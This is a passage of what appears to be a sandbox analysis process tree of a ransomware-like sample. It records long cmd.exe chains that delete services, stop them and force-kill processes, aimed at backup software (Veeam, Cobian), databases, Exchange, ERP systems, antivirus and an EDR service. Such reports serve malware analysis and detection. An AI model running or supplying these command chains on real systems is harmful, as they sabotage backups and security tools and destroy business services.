        sc delete aspnet_state @sc delete Redis
        5⤵
        
        PID:2476
    - - C:\Windows\system32\sc.exe
        
        sc delete OracleServiceORCL
        5⤵
        
        PID:2312
    - - C:\Windows\system32\sc.exe
        
        sc delete OracleVssWriterORCL
        5⤵
        
        PID:2120
      - C:\Windows\system32\net1.exe
        
        C:\Windows\system32\net1 stop Tomcat8
        6⤵
        
        PID:1664
    - - C:\Windows\system32\sc.exe
        
        sc delete OracleOraDb11g_home1TNSListener
        5⤵
        
        PID:780
    - - C:\Windows\system32\sc.exe
        
        sc delete OracleOraDb11g_home1ClrAgent
        5⤵
        
        PID:1668
    - - C:\Windows\system32\sc.exe
        
        sc delete ImeDictUpdateService
        5⤵
        
        PID:2908
    - - C:\Windows\system32\sc.exe
        
        sc delete allpass_redisservice_port21160
        5⤵
        
        PID:2472
    - - C:\Windows\system32\sc.exe
        
        sc delete "Kiwi Syslog Server"
        5⤵
        
        PID:2812
      - C:\Windows\system32\net1.exe
        
        C:\Windows\system32\net1 stop MSExchangeEdgeSync
        6⤵
        
        PID:2920
    - - C:\Windows\system32\sc.exe
        
        sc delete "UWS HiPriv Services"
        5⤵
        
        PID:2880
    - - C:\Windows\system32\sc.exe
        
        sc delete "Flash Helper Service"
        5⤵
        
        PID:2632
    - - C:\Windows\system32\sc.exe
        
        sc delete ImeDictUpdateService
        5⤵
        
        PID:2260
    - - C:\Windows\system32\sc.exe
        
        sc delete MCService
        5⤵
        
        PID:2056
    - - C:\Windows\system32\sc.exe
        
        sc delete XT800Service_Personal
        5⤵
        
        PID:1212
    - - C:\Windows\system32\sc.exe
        
        sc delete JhTask
        5⤵
        
        PID:2824
  - - C:\Windows\system32\cmd.exe
      cmd /c "@color b & sc delete MSCRMAsyncService & @sc delete REPLICA & @sc delete RTCATS & @sc delete RTCAVMCU & @sc delete RtcQms & @sc delete RTCMEETINGMCU & @sc delete RTCIMMCU & @sc delete RTCDATAMCU & @sc delete RTCCDR & @sc delete ProjectEventService16 & @sc delete ProjectQueueService16 & @sc delete SPAdminV4 & @sc delete SPSearchHostController & @sc delete SPTimerV4 & @sc delete SPTraceV4 & @sc delete OSearch16 & @sc delete ProjectCalcService16 & @sc delete c2wts & @sc delete AppFabricCachingService & @sc delete ADWS & @sc delete MotionBoard57 & @sc delete MotionBoardRCService57 & @sc delete vsvnjobsvc & @sc delete VisualSVNServer & @sc delete "FlexNet Licensing Service 64" & @sc delete BestSyncSvc & @sc delete LPManager & @sc delete MediatekRegistryWriter & @sc delete RaAutoInstSrv_RT2870 & @sc delete CobianBackup10 & @sc delete SQLANYs_sem5 & @sc delete CASLicenceServer & @sc delete SQLService & @sc delete semwebsrv & @sc delete TbossSystem & @sc delete ErpEnvSvc & @sc delete Mysoft.Autoupgrade.DispatchService & @sc delete Mysoft.Autoupgrade.UpdateService & @sc delete Mysoft.Config.WindowsService & @sc delete Mysoft.DataCenterService & @sc delete Mysoft.SchedulingService & @sc delete Mysoft.Setup.InstallService & @sc delete MysoftUpdate & @sc delete edr_monitor & @sc delete abs_deployer & @sc delete savsvc & @sc delete ShareBoxMonitorService & @sc delete ShareBoxService & @sc delete CloudExchangeService & @sc delete "U8WorkerService2" & @sc delete CIS & @sc delete EASService & @sc delete KICkSvr & @sc delete "OSP Service" & @sc delete U8SmsSrv & @sc delete OfficeClearCache & @sc delete TurboCRM70 & @sc delete U8DispatchService & @sc delete U8EISService & @sc delete U8EncryptService & @sc delete U8GCService & @sc delete U8KeyManagePool & @sc delete "U8MPool" & @sc delete U8SCMPool & @sc delete U8SLReportService & @sc delete U8TaskService & @sc delete "U8WebPool" & @sc delete UFAllNet & @sc delete UFReportService & @sc delete UTUService & @sc delete "U8WorkerService1""
      4⤵
      PID:940
    - - C:\Windows\system32\sc.exe
        
        sc delete MSCRMAsyncService
        5⤵
        
        PID:932
    - - C:\Windows\system32\sc.exe
        
        sc delete REPLICA
        5⤵
        
        PID:1052
    - - C:\Windows\system32\sc.exe
        
        sc delete RTCAVMCU
        5⤵
        
        PID:2352
      - C:\Windows\system32\net1.exe
        
        C:\Windows\system32\net1 stop OracleDBConsoleilas
        6⤵
        
        PID:2104
    - - C:\Windows\system32\sc.exe
        
        sc delete RTCATS
        5⤵
        
        PID:268
    - - C:\Windows\system32\sc.exe
        
        sc delete RTCIMMCU
        5⤵
        
        PID:2936
    - - C:\Windows\system32\sc.exe
        
        sc delete ProjectEventService16
        5⤵
        
        PID:2308
    - - C:\Windows\system32\sc.exe
        
        sc delete SPTimerV4
        5⤵
        
        PID:3004
    - - C:\Windows\system32\sc.exe
        
        sc delete SPSearchHostController
        5⤵
        
        PID:2764
    - - C:\Windows\system32\sc.exe
        
        sc delete AppFabricCachingService
        5⤵
        
        PID:2560
      - C:\Windows\system32\net1.exe
        
        C:\Windows\system32\net1 stop "NetBackup SAN Client Fibre Transport Service"
        6⤵
        
        PID:2672
        
        C:\Windows\system32\net1.exe
        
        C:\Windows\system32\net1 stop TeamViewer8
        7⤵
        
        PID:2732
    - - C:\Windows\system32\sc.exe
        
        sc delete ADWS
        5⤵
        
        PID:2764
    - - C:\Windows\system32\sc.exe
        
        sc delete MotionBoard57
        5⤵
        
        PID:2936
    - - C:\Windows\system32\sc.exe
        
        sc delete MotionBoardRCService57
        5⤵
        
        PID:2576
    - - C:\Windows\system32\sc.exe
        
        sc delete c2wts
        5⤵
        
        PID:2496
    - - C:\Windows\system32\sc.exe
        
        sc delete ProjectCalcService16
        5⤵
        
        PID:2244
    - - C:\Windows\system32\sc.exe
        
        sc delete OSearch16
        5⤵
        
        PID:1828
    - - C:\Windows\system32\sc.exe
        
        sc delete SPTraceV4
        5⤵
        
        PID:876
    - - C:\Windows\system32\sc.exe
        
        sc delete SPAdminV4
        5⤵
        
        PID:2704
      - C:\Windows\system32\net1.exe
        
        C:\Windows\system32\net1 stop MSExchangePOP3BE
        6⤵
        
        PID:2244
    - - C:\Windows\system32\sc.exe
        
        sc delete vsvnjobsvc
        5⤵
        
        PID:2748
    - - C:\Windows\system32\sc.exe
        
        sc delete ProjectQueueService16
        5⤵
        
        PID:2508
    - - C:\Windows\system32\sc.exe
        
        sc delete VisualSVNServer
        5⤵
        
        PID:2720
    - - C:\Windows\system32\sc.exe
        
        sc delete RTCCDR
        5⤵
        
        PID:2100
    - - C:\Windows\system32\sc.exe
        
        sc delete BestSyncSvc
        5⤵
        
        PID:3036
    - - C:\Windows\system32\sc.exe
        
        sc delete "FlexNet Licensing Service 64"
        5⤵
        
        PID:2972
    - - C:\Windows\system32\sc.exe
        
        sc delete RTCDATAMCU
        5⤵
        
        PID:1292
    - - C:\Windows\system32\sc.exe
        
        sc delete LPManager
        5⤵
        
        PID:1972
    - - C:\Windows\system32\sc.exe
        
        sc delete RTCMEETINGMCU
        5⤵
        
        PID:2800
    - - C:\Windows\system32\sc.exe
        
        sc delete MediatekRegistryWriter
        5⤵
        
        PID:1200
    - - C:\Windows\system32\sc.exe
        
        sc delete RaAutoInstSrv_RT2870
        5⤵
        
        PID:2244
    - - C:\Windows\system32\sc.exe
        
        sc delete RtcQms
        5⤵
        
        PID:2580
    - - C:\Windows\system32\sc.exe
        
        sc delete CobianBackup10
        5⤵
        
        PID:2636
    - - C:\Windows\system32\sc.exe
        
        sc delete SQLANYs_sem5
        5⤵
        
        PID:1232
    - - C:\Windows\system32\sc.exe
        
        sc delete TbossSystem
        5⤵
        
        PID:2300
    - - C:\Windows\system32\sc.exe
        
        sc delete semwebsrv
        5⤵
        
        PID:2140
      - C:\Windows\system32\net1.exe
        
        C:\Windows\system32\net1 stop VeeamDistributionSvc
        6⤵
        
        PID:268
    - - C:\Windows\system32\sc.exe
        
        sc delete ErpEnvSvc
        5⤵
        
        PID:3028
    - - C:\Windows\system32\sc.exe
        
        sc delete Mysoft.Autoupgrade.UpdateService
        5⤵
        
        PID:2220
    - - C:\Windows\system32\sc.exe
        
        sc delete Mysoft.DataCenterService
        5⤵
        
        PID:2876
    - - C:\Windows\system32\sc.exe
        
        sc delete Mysoft.Setup.InstallService
        5⤵
        
        PID:2232
    - - C:\Windows\system32\sc.exe
        
        sc delete edr_monitor
        5⤵
        
        PID:1832
      - C:\Windows\system32\net1.exe
        
        C:\Windows\system32\net1 stop U8TaskService
        6⤵
        
        PID:2844
    - - C:\Windows\system32\sc.exe
        
        sc delete "U8WorkerService2"
        5⤵
        
        PID:2056
    - - C:\Windows\system32\sc.exe
        
        sc delete CloudExchangeService
        5⤵
        
        PID:1200
    - - C:\Windows\system32\sc.exe
        
        sc delete CIS
        5⤵
        
        PID:2876
    - - C:\Windows\system32\sc.exe
        
        sc delete EASService
        5⤵
        
        PID:2248
    - - C:\Windows\system32\sc.exe
        
        sc delete ShareBoxService
        5⤵
        
        PID:1264
    - - C:\Windows\system32\sc.exe
        
        sc delete ShareBoxMonitorService
        5⤵
        
        PID:2912
      - C:\Windows\system32\net1.exe
        
        C:\Windows\system32\net1 stop U8WebPool
        6⤵
        
        PID:2016
    - - C:\Windows\system32\sc.exe
        
        sc delete KICkSvr
        5⤵
        
        PID:1972
    - - C:\Windows\system32\sc.exe
        
        sc delete savsvc
        5⤵
        
        PID:2100
    - - C:\Windows\system32\sc.exe
        
        sc delete abs_deployer
        5⤵
        
        PID:2536
    - - C:\Windows\system32\sc.exe
        
        sc delete "OSP Service"
        5⤵
        
        PID:2668
    - - C:\Windows\system32\sc.exe
        
        sc delete MysoftUpdate
        5⤵
        
        PID:2804
    - - C:\Windows\system32\sc.exe
        
        sc delete Mysoft.SchedulingService
        5⤵
        
        PID:2796
    - - C:\Windows\system32\sc.exe
        
        sc delete U8SmsSrv
        5⤵
        
        PID:400
    - - C:\Windows\system32\sc.exe
        
        sc delete OfficeClearCache
        5⤵
        
        PID:2452
    - - C:\Windows\system32\sc.exe
        
        sc delete Mysoft.Config.WindowsService
        5⤵
        
        PID:1724
    - - C:\Windows\system32\sc.exe
        
        sc delete TurboCRM70
        5⤵
        
        PID:2616
    - - C:\Windows\system32\sc.exe
        
        sc delete U8DispatchService
        5⤵
        
        PID:2516
    - - C:\Windows\system32\sc.exe
        
        sc delete U8EncryptService
        5⤵
        
        PID:1584
    - - C:\Windows\system32\sc.exe
        
        sc delete U8GCService
        5⤵
        
        PID:2752
    - - C:\Windows\system32\sc.exe
        
        sc delete U8EISService
        5⤵
        
        PID:2836
    - - C:\Windows\system32\sc.exe
        
        sc delete U8KeyManagePool
        5⤵
        
        PID:1212
      - C:\Windows\system32\net1.exe
        
        C:\Windows\system32\net1 stop SBOWorkflowEngine
        6⤵
        
        PID:2864
    - - C:\Windows\system32\sc.exe
        
        sc delete Mysoft.Autoupgrade.DispatchService
        5⤵
        Suspicious use of AdjustPrivilegeToken
        
        PID:1936
    - - C:\Windows\system32\sc.exe
        
        sc delete "U8MPool"
        5⤵
        
        PID:2348
      - C:\Windows\system32\net1.exe
        
        C:\Windows\system32\net1 stop MSExchangeIS
        6⤵
        
        PID:2380
    - - C:\Windows\system32\sc.exe
        
        sc delete U8SLReportService
        5⤵
        
        PID:2572
    - - C:\Windows\system32\sc.exe
        
        sc delete U8SCMPool
        5⤵
        
        PID:3036
    - - C:\Windows\system32\sc.exe
        
        sc delete "U8WebPool"
        5⤵
        
        PID:2072
    - - C:\Windows\system32\sc.exe
        
        sc delete UFAllNet
        5⤵
        
        PID:2460
    - - C:\Windows\system32\sc.exe
        
        sc delete UFReportService
        5⤵
        
        PID:2684
    - - C:\Windows\system32\sc.exe
        
        sc delete U8TaskService
        5⤵
        
        PID:268
    - - C:\Windows\system32\sc.exe
        
        sc delete SQLService
        5⤵
        
        PID:2784
    - - C:\Windows\system32\sc.exe
        
        sc delete UTUService
        5⤵
        
        PID:1264
    - - C:\Windows\system32\sc.exe
        
        sc delete "U8WorkerService1"
        5⤵
        
        PID:1332
    - - C:\Windows\system32\sc.exe
        
        sc delete CASLicenceServer
        5⤵
        
        PID:2804
  - - C:\Windows\system32\cmd.exe
      cmd /c "color b & @taskkill /IM ReportingServicesService.exe /F & @sc delete "SQL Server Reporting Services" & @sc delete MSSQLFDLauncher & @taskkill /IM U8CEServer.exe /F & @taskkill /IM ServerNT.exe /F & @net stop UFNet & @taskkill /IM MessageNotification.exe /F & @taskkill /IM cbVSCService11.exe /F & @taskkill /IM cbService.exe /F & @sc delete cbVSCService11 & @sc delete CobianBackup11"
      4⤵
      PID:1108
    - - C:\Windows\system32\taskkill.exe
        
        taskkill /IM ReportingServicesService.exe /F
        5⤵
        
        PID:1832
      - C:\Windows\system32\net1.exe
        
        C:\Windows\system32\net1 stop VeeamCatalogSvc
        6⤵
        
        PID:2536
    - - C:\Windows\system32\sc.exe
        
        sc delete MSSQLFDLauncher
        5⤵
        
        PID:268
    - - C:\Windows\system32\sc.exe
        
        sc delete "SQL Server Reporting Services"
        5⤵
        
        PID:3004
    - - C:\Windows\system32\taskkill.exe
        
        taskkill /IM U8CEServer.exe /F
        5⤵
        
        PID:2056
    - - C:\Windows\system32\taskkill.exe
        
        taskkill /IM ServerNT.exe /F
        5⤵
        
        PID:2484
    - - C:\Windows\system32\taskkill.exe
        
        taskkill /IM cbVSCService11.exe /F
        5⤵
        
        PID:2432
    - - C:\Windows\system32\taskkill.exe
        
        taskkill /IM MessageNotification.exe /F
        5⤵
        
        PID:1828
    - - C:\Windows\system32\net.exe
        
        net stop UFNet
        5⤵
        
        PID:1312
    - - C:\Windows\system32\taskkill.exe
        
        taskkill /IM cbService.exe /F
        5⤵
        
        PID:620
    - - C:\Windows\system32\sc.exe
        
        sc delete cbVSCService11
        5⤵
        
        PID:2920
    - - C:\Windows\system32\sc.exe
        
        sc delete CobianBackup11
        5⤵
        
        PID:2104
  - - C:\Windows\system32\cmd.exe
      cmd /c "color a & @net stop U8WorkerService1 & @net stop U8WorkerService2 & @net stop "memcached Server" & @net stop Apache2.4 & @net stop UFIDAWebService & @net stop MSComplianceAudit & @net stop MSExchangeADTopology & @net stop MSExchangeAntispamUpdate & @net stop MSExchangeCompliance & @net stop MSExchangeDagMgmt & @net stop MSExchangeDelivery & @net stop MSExchangeDiagnostics & @net stop MSExchangeEdgeSync & @net stop MSExchangeFastSearch & @net stop MSExchangeFrontEndTransport & @net stop MSExchangeHM & @net stop MSSQL$SQL2008 & @net stop MSExchangeHMRecovery & @net stop MSExchangeImap4 & @net stop MSExchangeIMAP4BE & @net stop MSExchangeIS & @net stop MSExchangeMailboxAssistants & @net stop MSExchangeMailboxReplication & @net stop MSExchangeNotificationsBroker & @net stop MSExchangePop3 & @net stop MSExchangePOP3BE & @net stop MSExchangeRepl & @net stop MSExchangeRPC & @net stop MSExchangeServiceHost & @net stop MSExchangeSubmission & @net stop MSExchangeThrottling & @net stop MSExchangeTransport & @net stop MSExchangeTransportLogSearch & @net stop MSExchangeUM & @net stop MSExchangeUMCR & @net stop MySQL5_OA"
      4⤵
      PID:984
    - - C:\Windows\system32\net.exe
        
        net stop U8WorkerService1
        5⤵
        
        PID:1668
      - C:\Windows\system32\net1.exe
        
        C:\Windows\system32\net1 stop U8WorkerService1
        6⤵
        
        PID:1664
    - - C:\Windows\system32\net.exe
        
        net stop U8WorkerService2
        5⤵
        
        PID:2280
      - C:\Windows\system32\net1.exe
        
        C:\Windows\system32\net1 stop U8WorkerService2
        6⤵
        
        PID:2432
    - - C:\Windows\system32\net.exe
        
        net stop "memcached Server"
        5⤵
        
        PID:2572
      - C:\Windows\system32\net1.exe
        
        C:\Windows\system32\net1 stop "memcached Server"
        6⤵
        
        PID:2620
    - - C:\Windows\system32\net.exe
        
        net stop UFIDAWebService
        5⤵
        
        PID:2924
      - C:\Windows\system32\net1.exe
        
        C:\Windows\system32\net1 stop UFIDAWebService
        6⤵
        
        PID:3000
    - - C:\Windows\system32\net.exe
        
        net stop MSExchangeDagMgmt
        5⤵
        
        PID:2908
      - C:\Windows\system32\net1.exe
        
        C:\Windows\system32\net1 stop MSExchangeDagMgmt
        6⤵
        
        PID:2168
        
        C:\Windows\system32\net1.exe
        
        C:\Windows\system32\net1 stop K3MobileServiceManage
        7⤵
        
        PID:2348
    - - C:\Windows\system32\net.exe
        
        net stop MSExchangeCompliance
        5⤵
        
        PID:2788
    - - C:\Windows\system32\net.exe
        
        net stop MSExchangeFastSearch
        5⤵
        
        PID:1788
      - C:\Windows\system32\net1.exe
        
        C:\Windows\system32\net1 stop MSExchangeFastSearch
        6⤵
        
        PID:2484
    - - C:\Windows\system32\net.exe
        
        net stop MSExchangeEdgeSync
        5⤵
        
        PID:2812
    - - C:\Windows\system32\net.exe
        
        net stop MSExchangeFrontEndTransport
        5⤵
        
        PID:2312
      - C:\Windows\system32\net1.exe
        
        C:\Windows\system32\net1 stop MSExchangeFrontEndTransport
        6⤵
        
        PID:2632
    - - C:\Windows\system32\net.exe
        
        net stop MSExchangeDiagnostics
        5⤵
        
        PID:2676
    - - C:\Windows\system32\net.exe
        
        net stop MSExchangeDelivery
        5⤵
        
        PID:2104
    - - C:\Windows\system32\net.exe
        
        net stop MSExchangeAntispamUpdate
        5⤵
        
        PID:2504
    - - C:\Windows\system32\net.exe
        
        net stop MSExchangeADTopology
        5⤵
        
        PID:2196
    - - C:\Windows\system32\net.exe
        
        net stop MSExchangeHM
        5⤵
        
        PID:2816
    - - C:\Windows\system32\net.exe
        
        net stop MSSQL$SQL2008
        5⤵
        
        PID:2884
      - C:\Windows\system32\net1.exe
        
        C:\Windows\system32\net1 stop MSSQL$SQL2008
        6⤵
        
        PID:2136
    - - C:\Windows\system32\net.exe
        
        net stop MSComplianceAudit
        5⤵
        
        PID:1052
    - - C:\Windows\system32\net.exe
        
        net stop MSExchangeHMRecovery
        5⤵
        
        PID:2432
      - C:\Windows\system32\net1.exe
        
        C:\Windows\system32\net1 stop MSExchangeHMRecovery
        6⤵
        
        PID:2680
      - C:\Windows\system32\net1.exe
        
        C:\Windows\system32\net1 stop MSExchangeRepl
        6⤵
        
        PID:2204
    - - C:\Windows\system32\net.exe
        
        net stop Apache2.4
        5⤵
        
        PID:2744
    - - C:\Windows\system32\net.exe
        
        net stop MSExchangeImap4
        5⤵
        
        PID:2720
    - - C:\Windows\system32\net.exe
        
        net stop MSExchangeMailboxReplication
        5⤵
        
        PID:2420
    - - C:\Windows\system32\net.exe
        
        net stop MSExchangeMailboxAssistants
        5⤵
        
        PID:1184
    - - C:\Windows\system32\net.exe
        
        net stop MSExchangePop3
        5⤵
        
        PID:2916
      - C:\Windows\system32\net1.exe
        
        C:\Windows\system32\net1 stop MSExchangePop3
        6⤵
        
        PID:524
      - C:\Windows\system32\net1.exe
        
        C:\Windows\system32\net1 stop MySQL5_OA
        6⤵
        
        PID:2376
    - - C:\Windows\system32\net.exe
        
        net stop MSExchangeServiceHost
        5⤵
        
        PID:2764
      - C:\Windows\system32\net1.exe
        
        C:\Windows\system32\net1 stop MSExchangeServiceHost
        6⤵
        
        PID:2188
    - - C:\Windows\system32\net.exe
        
        net stop MSExchangeSubmission
        5⤵
        
        PID:2064
    - - C:\Windows\system32\net.exe
        
        net stop MSExchangeThrottling
        5⤵
        
        PID:2972
      - C:\Windows\system32\net1.exe
        
        C:\Windows\system32\net1 stop MSExchangeThrottling
        6⤵
        
        PID:2812
        
        C:\Windows\system32\net1.exe
        
        C:\Windows\system32\net1 stop VeeamBrokerSvc
        7⤵
        
        PID:2016
    - - C:\Windows\system32\net.exe
        
        net stop MSExchangeTransport
        5⤵
        
        PID:3064
      - C:\Windows\system32\net1.exe
        
        C:\Windows\system32\net1 stop MSExchangeTransport
        6⤵
        
        PID:2920
    - - C:\Windows\system32\net.exe
        
        net stop MSExchangeTransportLogSearch
        5⤵
        
        PID:2436
    - - C:\Windows\system32\net.exe
        
        net stop MSExchangeRPC
        5⤵
        
        PID:2856
    - - C:\Windows\system32\net.exe
        
        net stop MSExchangeUM
        5⤵
        
        PID:2584
      - C:\Windows\system32\net1.exe
        
        C:\Windows\system32\net1 stop MSExchangeUM
        6⤵
        
        PID:3008
    - - C:\Windows\system32\net.exe
        
        net stop MSExchangeRepl
        5⤵
        
        PID:2432
    - - C:\Windows\system32\net.exe
        
        net stop MSExchangePOP3BE
        5⤵
        
        PID:2704
    - - C:\Windows\system32\net.exe
        
        net stop MSExchangeUMCR
        5⤵
        
        PID:2220
      - C:\Windows\system32\net1.exe
        
        C:\Windows\system32\net1 stop MSExchangeUMCR
        6⤵
        
        PID:620
    - - C:\Windows\system32\net.exe
        
        net stop MySQL5_OA
        5⤵
        
        PID:2916
    - - C:\Windows\system32\net.exe
        
        net stop MSExchangeNotificationsBroker
        5⤵
        
        PID:2240
    - - C:\Windows\system32\net.exe
        
        net stop MSExchangeIS
        5⤵
        
        PID:2348
    - - C:\Windows\system32\net.exe
        
        net stop MSExchangeIMAP4BE
        5⤵
        
        PID:2168
  - - C:\Windows\system32\cmd.exe
      cmd /c "color e & @taskkill /IM sqlservr.exe /F & @taskkill /IM httpd.exe /F & @taskkill /IM java.exe /F & @taskkill /IM fdhost.exe /F & @taskkill /IM fdlauncher.exe /F & @taskkill /IM Veeam.Backup.Service.exe /F & @taskkill /IM reportingservicesservice.exe /F & @taskkill /IM softmgrlite.exe /F & @taskkill /IM sqlbrowser.exe /F & @taskkill /IM ssms.exe /F & @taskkill /IM vmtoolsd.exe /F & @taskkill /IM baidunetdisk.exe /F & @taskkill /IM yundetectservice.exe /F & @taskkill /IM ssclient.exe /F & @taskkill /IM GNAupdaemon.exe /F & @taskkill /IM RAVCp164.exe /F & @taskkill /IM igfxEM.exe /F & @taskkill /IM igfxHK.exe /F & @taskkill /IM igfxTray.exe /F & @taskkill /IM 360bdoctor.exe /F & @taskkill /IM GNCEFExternal.exe /F & @taskkill /IM PrivacyIconClient.exe /F & @taskkill /IM UIODetect.exe /F & @taskkill /IM AutoDealService.exe /F & @taskkill /IM IDDAService.exe /F & @taskkill /IM EnergyDataService.exe /F & @taskkill /IM MPService.exe /F & @taskkill /IM TransMain.exe /F & @taskkill /IM DAService.exe /F & @taskkill /IM GoogleCrashHandler.exe /F & @taskkill /IM GoogleCrashHandler64.exe /F & @taskkill /IM GoogleUpdate.exe /F & @taskkill /IM cohernece.exe /F & @taskkill /IM vmware-tray.exe /F & @taskkill /IM MsDtsSrvr.exe /F & @taskkill /IM msmdsrv.exe /F & @taskkill /IM "FileZilla server.exe" /F & @taskkill /IM UpdateData.exe /F & @taskkill /IM WebApi.Host.exe /F & @taskkill /IM VGAuthService.exe /F & @taskkill /IM omtsreco.exe /F & @taskkill /IM TNSLSNR.exe /F & @taskkill /IM oracle.exe /F & @taskkill /IM msdtc.exe /F & @taskkill /IM mmc.exe /F & @taskkill /IM emagent.exe /F & @taskkill /IM SoftMgrLite.exe /F & @taskkill /IM UIODetect.exe /F & @taskkill /IM AutoDealService.exe /F & @taskkill /IM Admin.exe /F & @taskkill /IM IDDAService.exe /F & @taskkill /IM EnergyDataService.exe /F & @taskkill /IM EnterprisePortal.exe /F & @taskkill /IM MPService.exe /F & @taskkill /IM TransMain.exe /F & @taskkill /IM DAService.exe /F & @taskkill /IM tomcat7.exe /F & @taskkill /IM cohernece.exe /F & @taskkill /IM vmware-tray.exe /F & @taskkill /IM MsDtsSrvr.exe /F & @taskkill /IM Kingdee.K3.CRM.MMC.MMCService.exe /F & @taskkill /IM Kingdee.k3.Weixin.ClientService.exe /F & @taskkill /IM Kingdee.K3.PUBLIC.BkgSvcHost.exe /F & @taskkill /IM Kingdee.K3.HR.Server.exe /F & @taskkill /IM Kingdee.K3.PUBLIC.KDSvrMgrHost.exe /F & @taskkill /IM tomcat5.exe /F & @taskkill /IM Kingdee.DeskTool.exe /F & @taskkill /IM UserClient.exe /F & @taskkill /IM GNAupdaemon.exe /F & @taskkill /IM mysqld.exe /F & @taskkill /IM ImtsEventSvr.exe /F & @taskkill /IM mysqld-nt.exe /F & @taskkill /IM 360EnterpriseDiskUI.exe /F & @taskkill /IM msmdsrv.exe /F & @taskkill /IM UpdateData.exe /F & @taskkill /IM WebApi.Host.exe /F & @taskkill /IM VGAuthService.exe /F & @taskkill /IM omtsreco.exe /F & @taskkill /IM TNSLSNR.exe /F & @taskkill /IM oracle.exe /F & @taskkill /IM msdtc.exe /F & @taskkill /IM mmc.exe /F & @taskkill /IM emagent.exe /F & @taskkill /IM SoftMgrLite.exe /F & @taskkill /IM tomcat8.exe /F & @taskkill /IM QQprotect.exe /F & @taskkill /IM isqlplussvc.exe /F & @taskkill /IM nmesrvc.exe /F & @taskkill /IM mysqld.exe /F & @taskkill /IM jusched.exe /F & @taskkill /IM MtxHotPlugService.exe /F & @taskkill /IM jucheck.exe /F & @taskkill /IM wordpad.exe /F & @taskkill /IM SecureCRT.exe /F & @taskkill /IM chrome.exe /F & @taskkill /IM Thunder.exe /F"
      4⤵
      PID:1960
    - - C:\Windows\system32\taskkill.exe
        
        taskkill /IM sqlservr.exe /F
        5⤵
        Suspicious use of AdjustPrivilegeToken
        
        PID:2268
    - - C:\Windows\system32\taskkill.exe
        
        taskkill /IM httpd.exe /F
        5⤵
        
        PID:2084
    - - C:\Windows\system32\taskkill.exe
        
        taskkill /IM java.exe /F
        5⤵
        
        PID:2416
    - - C:\Windows\system32\taskkill.exe
        
        taskkill /IM fdhost.exe /F
        5⤵
        
        PID:2748
    - - C:\Windows\system32\taskkill.exe
        
        taskkill /IM fdlauncher.exe /F
        5⤵
        
        PID:2584
    - - C:\Windows\system32\taskkill.exe
        
        taskkill /IM Veeam.Backup.Service.exe /F
        5⤵
        
        PID:3020
    - - C:\Windows\system32\taskkill.exe
        
        taskkill /IM reportingservicesservice.exe /F
        5⤵
        
        PID:1556
    - - C:\Windows\system32\taskkill.exe
        
        taskkill /IM softmgrlite.exe /F
        5⤵
        Suspicious use of AdjustPrivilegeToken
        
        PID:1288
    - - C:\Windows\system32\taskkill.exe
        
        taskkill /IM sqlbrowser.exe /F
        5⤵
        
        PID:2572
    - - C:\Windows\system32\taskkill.exe
        
        taskkill /IM ssms.exe /F
        5⤵
        
        PID:2636
    - - C:\Windows\system32\taskkill.exe
        
        taskkill /IM vmtoolsd.exe /F
        5⤵
        
        PID:2936
    - - C:\Windows\system32\taskkill.exe
        
        taskkill /IM baidunetdisk.exe /F
        5⤵
        
        PID:1612
    - - C:\Windows\system32\taskkill.exe
        
        taskkill /IM yundetectservice.exe /F
        5⤵
        
        PID:2504
    - - C:\Windows\system32\taskkill.exe
        
        taskkill /IM ssclient.exe /F
        5⤵
        
        PID:2820
    - - C:\Windows\system32\taskkill.exe
        
        taskkill /IM GNAupdaemon.exe /F
        5⤵
        
        PID:2284
    - - C:\Windows\system32\taskkill.exe
        
        taskkill /IM RAVCp164.exe /F
        5⤵
        
        PID:1536
    - - C:\Windows\system32\taskkill.exe
        
        taskkill /IM igfxEM.exe /F
        5⤵
        
        PID:2272
    - - C:\Windows\system32\taskkill.exe
        
        taskkill /IM igfxHK.exe /F
        5⤵
        
        PID:2784
    - - C:\Windows\system32\taskkill.exe
        
        taskkill /IM igfxTray.exe /F
        5⤵
        
        PID:1232
    - - C:\Windows\system32\taskkill.exe
        
        taskkill /IM 360bdoctor.exe /F
        5⤵
        
        PID:2548
    - - C:\Windows\system32\taskkill.exe
        
        taskkill /IM GNCEFExternal.exe /F
        5⤵
        
        PID:1796
    - - C:\Windows\system32\taskkill.exe
        
        taskkill /IM PrivacyIconClient.exe /F
        5⤵
        Kills process with taskkill
        
        PID:996
    - - C:\Windows\system32\taskkill.exe
        
        taskkill /IM UIODetect.exe /F
        5⤵
        
        PID:1012
    - - C:\Windows\system32\taskkill.exe
        
        taskkill /IM AutoDealService.exe /F
        5⤵
        
        PID:2192
    - - C:\Windows\system32\taskkill.exe
        
        taskkill /IM IDDAService.exe /F
        5⤵
        
        PID:556
    - - C:\Windows\system32\taskkill.exe
        
        taskkill /IM EnergyDataService.exe /F
        5⤵
        
        PID:2140
    - - C:\Windows\system32\taskkill.exe
        
        taskkill /IM MPService.exe /F
        5⤵
        Kills process with taskkill
        
        PID:2404
    - - C:\Windows\system32\taskkill.exe
        
        taskkill /IM TransMain.exe /F
        5⤵
        
        PID:2780
    - - C:\Windows\system32\taskkill.exe
        
        taskkill /IM DAService.exe /F
        5⤵
        
        PID:2876
    - - C:\Windows\system32\taskkill.exe
        
        taskkill /IM GoogleCrashHandler.exe /F
        5⤵
        
        PID:2568
    - - C:\Windows\system32\taskkill.exe
        
        taskkill /IM GoogleCrashHandler64.exe /F
        5⤵
        
        PID:2792
    - - C:\Windows\system32\taskkill.exe
        
        taskkill /IM GoogleUpdate.exe /F
        5⤵
        
        PID:1832
    - - C:\Windows\system32\taskkill.exe
        
        taskkill /IM cohernece.exe /F
        5⤵
        
        PID:2492
    - - C:\Windows\system32\taskkill.exe
        
        taskkill /IM vmware-tray.exe /F
        5⤵
        
        PID:2988
    - - C:\Windows\system32\taskkill.exe
        
        taskkill /IM MsDtsSrvr.exe /F
        5⤵
        
        PID:3008
    - - C:\Windows\system32\taskkill.exe
        
        taskkill /IM msmdsrv.exe /F
        5⤵
        
        PID:2064
    - - C:\Windows\system32\taskkill.exe
        
        taskkill /IM "FileZilla server.exe" /F
        5⤵
        
        PID:1660
    - - C:\Windows\system32\taskkill.exe
        
        taskkill /IM UpdateData.exe /F
        5⤵
        
        PID:2292
    - - C:\Windows\system32\taskkill.exe
        
        taskkill /IM WebApi.Host.exe /F
        5⤵
        Suspicious use of AdjustPrivilegeToken
        
        PID:2820
    - - C:\Windows\system32\taskkill.exe
        
        taskkill /IM VGAuthService.exe /F
        5⤵
        
        PID:1292
    - - C:\Windows\system32\taskkill.exe
        
        taskkill /IM omtsreco.exe /F
        5⤵
        
        PID:2016
    - - C:\Windows\system32\taskkill.exe
        
